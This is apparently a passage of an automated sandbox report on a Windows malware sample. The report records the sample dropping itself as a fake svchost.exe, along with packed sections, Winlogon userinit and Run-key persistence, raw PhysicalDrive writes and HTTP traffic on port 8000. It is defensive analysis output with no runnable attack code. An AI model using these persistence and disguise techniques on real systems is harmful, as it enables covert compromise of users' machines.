    Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: C:\Users\user\Desktop\arxtPs1STE.exeUnpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.1.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack
    Source: C:\Users\user\Desktop\arxtPs1STE.exeUnpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.1.unpack
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: svchost.exe.0.drStatic PE information: real checksum: 0xbc875f1 should be: 0x3615e
    Source: arxtPs1STE.exeStatic PE information: real checksum: 0x59c9818d should be: 0x3615e
    Source: arxtPs1STE.exeStatic PE information: section name: .D
    Source: arxtPs1STE.exeStatic PE information: section name: .SC
    Source: arxtPs1STE.exeStatic PE information: section name: .Wp
    Source: arxtPs1STE.exeStatic PE information: section name: .aS
    Source: arxtPs1STE.exeStatic PE information: section name: .vtzr
    Source: arxtPs1STE.exeStatic PE information: section name: .fvH
    Source: arxtPs1STE.exeStatic PE information: section name: .Lx
    Source: arxtPs1STE.exeStatic PE information: section name: .sOZF
    Source: arxtPs1STE.exeStatic PE information: section name: .h
    Source: svchost.exe.0.drStatic PE information: section name: .D
    Source: svchost.exe.0.drStatic PE information: section name: .SC
    Source: svchost.exe.0.drStatic PE information: section name: .Wp
    Source: svchost.exe.0.drStatic PE information: section name: .aS
    Source: svchost.exe.0.drStatic PE information: section name: .vtzr
    Source: svchost.exe.0.drStatic PE information: section name: .fvH
    Source: svchost.exe.0.drStatic PE information: section name: .Lx
    Source: svchost.exe.0.drStatic PE information: section name: .sOZF
    Source: svchost.exe.0.drStatic PE information: section name: .h
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_020E065B push ebx; ret 0_2_020E0677
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_020E0678 push dword ptr [esp+48h]; ret 0_2_020E0747
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B33 push cs; ret 2_2_02BF8B48
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B69 push cs; iretd 2_2_02BF8B78
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF849D push es; iretd 2_2_02BF84AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF4DE0 push eax; ret 2_2_02BF4E0E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E0678 push dword ptr [esp+48h]; ret 2_2_023E0747
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E065B push ebx; ret 2_2_023E0677
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46895 push cs; retf 0004h2_2_02A468F5
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4989D push es; iretd 2_2_02A498AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A368D2 push ebp; retf 2_2_02A368D3
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A461E0 push eax; ret 2_2_02A4620E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3664C push ebp; retf 2_2_02A3664D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4656A push eax; ret 2_2_02A4656D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46576 push ss; ret 2_2_02A46579

    Persistence and Installation Behavior

    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_008E33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_008933F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_02BE33F0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\arxtPs1STE.exeExecutable created and started: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403560

    Boot Survival

    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_008E33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_008933F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_02BE33F0
    Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    Hooking and other Techniques for Hiding and Protection

    Source: c:\users\user\desktop\arxtps1ste.exeFile moved: C:\Users\user\AppData\Local\Temp\A834.tmp
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02BBD300
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02BB9ED0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02BBCD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_008DD300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_008DCD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_008D9ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_008DCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0088D300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0088CD50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00889ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_00889ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0088CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0088CFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,9_2_02BDD300
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,9_2_02BD9ED0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCFE9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_02BDCDC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,9_2_02BDCD50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
